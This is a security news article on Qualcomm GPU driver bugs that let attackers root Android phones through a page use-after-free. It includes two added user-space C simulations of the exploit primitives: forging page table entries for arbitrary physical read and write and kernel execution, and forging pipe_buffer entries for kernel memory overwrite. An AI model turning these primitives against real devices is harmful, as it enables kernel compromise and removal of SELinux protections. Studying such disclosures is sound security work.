Two Methods to Root Qualcomm-Based Android Phones

Security researchers have disclosed critical vulnerabilities in the Qualcomm GPU driver (kgsl), affecting a wide range of Android devices from Samsung, Honor, Xiaomi, Vivo and other vendors.

The exploits are built on a GPU Address Fault (GPUAF) primitive and target the driver's kgsl_mem_entry and Virtual Buffer Object (VBO) structures.

By combining race conditions with memory-management flaws, an attacker turns these bugs into a page-level use-after-free (UaF) and escalates from there to root.


The relevant bugs are CVE-2024-23380 and CVE-2024-23373: both are race conditions between VBO mapping and unmapping that leave the driver's memory accounting inconsistent, and the two can be chained.

Figure: Chain bugs to page UAF

The work points to a systemic weakness in chipset-specific driver code: the Qualcomm GPU driver ships in flagship devices such as the Snapdragon (non-Exynos) Samsung Galaxy S models and the Xiaomi 14 line, so a single bug class in it reaches many vendors at once.

Dual Exploitation Paths: Page Tables and Pipe Buffers

The researchers describe two ways of turning the page UaF into privilege escalation on affected Android systems.

The first method reclaims the freed page as an ARM64 page table: the attacker creates anonymous mappings until the kernel allocates a last-level page table from the UaF page, and the stale reference to that page then gives direct write access to its page table entries (PTEs).

According to the report, control over PTEs lets the attacker turn read-only pages read-write, build a physical arbitrary address read/write (AARW) primitive by repointing an entry at any physical page, and mark regions executable to run arbitrary kernel shellcode.

Kernel image addresses are fixed on most devices (Samsung devices with physical ASLR are the exception), so the attacker can compute targets directly, disable SELinux by overwriting selinux_state, and hijack the init process by injecting shellcode into libc++.so, ending in a root shell.
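To make the PTE edits concrete, the following is an added example, not code from the report or from the Qualcomm driver: it models one 4K page of ARM64 level-3 descriptors (the unit a reclaimed UaF page would hold) and shows the three edits the first method relies on, read-only to read-write, clearing execute-never, and repointing an entry at a chosen physical page to get the AARW window. Bit positions follow Linux's pgtable-hwdef.h; the memory attribute index and the sample physical addresses are assumptions, and nothing here touches a real kernel.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* ARM64 4K-granule level-3 (page) descriptor bits, named as in
 * arch/arm64/include/asm/pgtable-hwdef.h. */
#define PAGE_SHIFT        12
#define PAGE_SIZE         (1ULL << PAGE_SHIFT)
#define PTRS_PER_PTE      512                /* one 4K page of descriptors */
#define PTE_VALID         (1ULL << 0)
#define PTE_TYPE_PAGE     (1ULL << 1)
#define PTE_ATTRINDX(i)   ((uint64_t)(i) << 2)
#define PTE_USER          (1ULL << 6)        /* AP[1]: accessible from EL0 */
#define PTE_RDONLY        (1ULL << 7)        /* AP[2]: read-only when set */
#define PTE_SHARED        (3ULL << 8)        /* inner shareable */
#define PTE_AF            (1ULL << 10)       /* access flag */
#define PTE_NG            (1ULL << 11)       /* not global (ASID-tagged) */
#define PTE_DBM           (1ULL << 51)       /* hardware dirty-bit mgmt; Linux's PTE_WRITE */
#define PTE_PXN           (1ULL << 53)       /* privileged execute-never */
#define PTE_UXN           (1ULL << 54)       /* user execute-never */
#define PTE_ADDR_MASK     (((1ULL << 48) - 1) & ~(PAGE_SIZE - 1))  /* output address [47:12] */

/* MAIR index for normal cacheable memory. The slot differs between kernel
 * versions, so 0 is an assumption for this simulated table. */
#define MT_NORMAL_IDX     0

static inline uint64_t pte_pa(uint64_t pte)      { return pte & PTE_ADDR_MASK; }
static inline bool pte_present(uint64_t pte)     { return (pte & (PTE_VALID | PTE_TYPE_PAGE)) == (PTE_VALID | PTE_TYPE_PAGE); }
static inline bool pte_writable(uint64_t pte)    { return pte_present(pte) && !(pte & PTE_RDONLY); }
static inline bool pte_kernel_exec(uint64_t pte) { return pte_present(pte) && !(pte & PTE_PXN); }

/* Read-only -> read-write. AP[2] is what the MMU checks; DBM keeps the
 * kernel's own pte_write() view consistent so it does not "repair" the entry. */
uint64_t pte_make_rw(uint64_t pte) { return (pte & ~PTE_RDONLY) | PTE_DBM; }

/* Allow execution at EL1 so the page can carry kernel shellcode. */
uint64_t pte_make_kernel_exec(uint64_t pte) { return pte & ~PTE_PXN; }

/* AARW building block: keep every attribute of a template entry and replace
 * only the output address. Returns 0 for a misaligned or out-of-range target
 * so a caller cannot emit a garbage descriptor. */
uint64_t pte_retarget(uint64_t template, uint64_t target_pa) {
    if (target_pa & (PAGE_SIZE - 1)) return 0;
    if (target_pa >= (1ULL << 48)) return 0;
    return (template & ~PTE_ADDR_MASK) | target_pa;
}

/* Stands in for the freed page after it has been reclaimed as a last-level
 * page table for an attacker-owned anonymous mapping. */
uint64_t sim_pt[PTRS_PER_PTE];

/* Populate slot idx the way the kernel would for an ordinary anonymous user
 * page: user-accessible, writable, never executable. */
void sim_map_user_page(unsigned idx, uint64_t pa) {
    if (idx >= PTRS_PER_PTE) return;
    sim_pt[idx] = PTE_VALID | PTE_TYPE_PAGE | PTE_ATTRINDX(MT_NORMAL_IDX) | PTE_USER
                | PTE_SHARED | PTE_AF | PTE_NG | PTE_DBM | PTE_PXN | PTE_UXN
                | (pa & PTE_ADDR_MASK);
}

/* Turn slot idx into a window onto target_pa: once the stale TLB entry is
 * invalidated, user-space loads and stores through that VA reach the chosen
 * physical page. Returns false if the slot is not a mapped page. */
bool sim_aarw_window(unsigned idx, uint64_t target_pa) {
    if (idx >= PTRS_PER_PTE || !pte_present(sim_pt[idx])) return false;
    uint64_t pte = pte_retarget(pte_make_rw(sim_pt[idx]), target_pa);
    if (!pte) return false;
    sim_pt[idx] = pte;
    return true;
}

int main(void) {
    /* Constructed sample values; the kernel physical address is hypothetical. */
    uint64_t ro = PTE_VALID | PTE_TYPE_PAGE | PTE_AF | PTE_SHARED | PTE_RDONLY | PTE_UXN | 0x80200000ULL;
    printf("ro entry   %016llx writable=%d\n", (unsigned long long)ro, pte_writable(ro));
    uint64_t rw = pte_make_rw(ro);
    printf("rw entry   %016llx writable=%d\n", (unsigned long long)rw, pte_writable(rw));
    sim_map_user_page(7, 0x90000000ULL);
    sim_aarw_window(7, 0x80200000ULL);   /* e.g. the page holding selinux_state */
    printf("slot 7 now -> pa %#llx writable=%d\n",
           (unsigned long long)pte_pa(sim_pt[7]), pte_writable(sim_pt[7]));
    return 0;
}
```

The checks in pte_retarget and sim_aarw_window are the part worth copying: a forged descriptor with a misaligned output address or one aimed at an unmapped slot is how an exploit attempt turns into a kernel panic rather than a primitive.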

The second method reclaims the freed page with pipe_buffer arrays and forges their entries to obtain read and write primitives.

Figure: Page UAF

Setting flags such as PIPE_BUF_FLAG_CAN_MERGE on a forged entry makes later pipe writes land in whichever page the entry points to, which yields an arbitrary kernel memory overwrite; from there the SELinux bypass and process hijack proceed as in the first method.
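What a forged pipe_buffer array looks like, as an added example rather than the report's own code: the struct layout and flag values mirror include/linux/pipe_fs_i.h on a 64-bit kernel, and the two forge functions show why PIPE_BUF_FLAG_CAN_MERGE matters, since pipe_write() appends into the head buffer's page at offset + len when that flag is set and the data fits. The vmemmap base, sizeof(struct page), the ops pointer and all addresses are hypothetical values for a modelled kernel and would have to be recovered from the real target; the code runs entirely in user space.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE  (1ULL << PAGE_SHIFT)

/* Flag values from include/linux/pipe_fs_i.h. */
#define PIPE_BUF_FLAG_LRU       0x01
#define PIPE_BUF_FLAG_ATOMIC    0x02
#define PIPE_BUF_FLAG_GIFT      0x04
#define PIPE_BUF_FLAG_PACKET    0x08
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
#define PIPE_BUF_FLAG_WHOLE     0x20

/* User-space mirror of the kernel's struct pipe_buffer (40 bytes on a 64-bit
 * kernel): the bytes the attacker writes into the reclaimed page. */
struct pipe_buffer {
    uint64_t page;          /* struct page * */
    uint32_t offset, len;   /* valid bytes: [offset, offset + len) */
    uint64_t ops;           /* const struct pipe_buf_operations * */
    uint32_t flags;
    uint64_t private_;
};

/* Hypothetical layout of the modelled kernel, not values from the report. */
#define VMEMMAP_BASE    0xfffffc0000000000ULL
#define STRUCT_PAGE_SZ  64ULL

uint64_t phys_to_page(uint64_t pa)   { return VMEMMAP_BASE + (pa >> PAGE_SHIFT) * STRUCT_PAGE_SZ; }
uint64_t page_to_phys(uint64_t page) { return ((page - VMEMMAP_BASE) / STRUCT_PAGE_SZ) << PAGE_SHIFT; }

/* Physical address the next merged write() lands at: pipe_write() appends into
 * the head buffer's page at offset + len when CAN_MERGE is set and it fits. */
uint64_t next_write_phys(const struct pipe_buffer *b) {
    return page_to_phys(b->page) + b->offset + b->len;
}

/* Forge a slot so that the next write() hits target_pa + off. len stays 0 so
 * the write cursor is exactly off. ops must point at a real
 * pipe_buf_operations (e.g. anon_pipe_buf_ops, assumed known from the symbol
 * table) or the release path dereferences garbage. */
bool forge_write_slot(struct pipe_buffer *b, uint64_t target_pa, uint32_t off, uint64_t ops) {
    if ((target_pa & (PAGE_SIZE - 1)) || off >= PAGE_SIZE || !ops) return false;
    b->page = phys_to_page(target_pa);
    b->offset = off;
    b->len = 0;
    b->ops = ops;
    b->flags = PIPE_BUF_FLAG_CAN_MERGE;
    b->private_ = 0;
    return true;
}

/* Forge a slot so that read() returns len bytes starting at target_pa + off. */
bool forge_read_slot(struct pipe_buffer *b, uint64_t target_pa, uint32_t off, uint32_t len, uint64_t ops) {
    if ((target_pa & (PAGE_SIZE - 1)) || !ops) return false;
    if (len == 0 || (uint64_t)off + len > PAGE_SIZE) return false;
    b->page = phys_to_page(target_pa);
    b->offset = off;
    b->len = len;
    b->ops = ops;
    b->flags = 0;            /* nothing to merge, the slot is only drained */
    b->private_ = 0;
    return true;
}

/* Invariant every forged slot must keep: its byte range stays inside one page.
 * Breaking it corrupts the neighbouring page instead of giving a clean primitive. */
bool ring_slots_ok(const struct pipe_buffer *ring, unsigned n) {
    for (unsigned i = 0; i < n; i++)
        if ((uint64_t)ring[i].offset + ring[i].len > PAGE_SIZE) return false;
    return true;
}

struct pipe_buffer g_slot;   /* scratch slot for stand-alone use */

int main(void) {
    const uint64_t ops = 0xffffffc010abc000ULL;   /* hypothetical anon_pipe_buf_ops */
    struct pipe_buffer ring[2];
    forge_write_slot(&ring[0], 0x80040000ULL, 0x100, ops);
    forge_read_slot(&ring[1], 0x80040000ULL, 0, 0x40, ops);
    printf("sizeof(pipe_buffer)=%zu\n", sizeof(struct pipe_buffer));
    printf("slot0: next write hits pa %#llx, flags %#x\n",
           (unsigned long long)next_write_phys(&ring[0]), ring[0].flags);
    printf("slot1: read returns %u bytes from pa %#llx\n",
           ring[1].len, (unsigned long long)page_to_phys(ring[1].page));
    printf("ring ok: %d\n", ring_slots_ok(ring, 2));
    return 0;
}
```

Only the slot at the pipe's head is consulted for merging, so in practice the forged array needs its head index and the forged entry to line up; that bookkeeping lives in struct pipe_inode_info, which this model leaves out.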

Both techniques rest on a detailed understanding of kernel memory management and the GPU driver's internals; in particular, the researchers pick aio pages allocated with GFP_HIGHUSER as the pages to free and reuse for kernel object manipulation.

The exploits also get past the additional mitigations on Samsung devices: the KNOX hypervisor at EL2, DEFEX whitelisting and a hardened SELinux configuration.

The researchers worked around these by forging SELinux nodes through the AARW primitive in kernel space and, once SELinux was disabled, injecting libraries into user-space processes that DEFEX whitelists.

Against Samsung's physical ASLR they recovered kernel offsets either by brute-force checks on the instructions at _stext or by remapping vdso pages into a controlled page table.

They also proposed ways to derive kernel offsets without any firmware access, using SELinux policy behaviour to manipulate file permissions under /data/local/tmp.

The full chain, demonstrated on devices from several vendors, shows how fragile GPU driver security currently is and how much effort a working exploit still requires.

The implication for manufacturers is that mitigations have to be evaluated against chained techniques like these: taken individually, the hypervisor, whitelisting and SELinux hardening did not stop a multi-stage attack on Qualcomm-based Android devices.
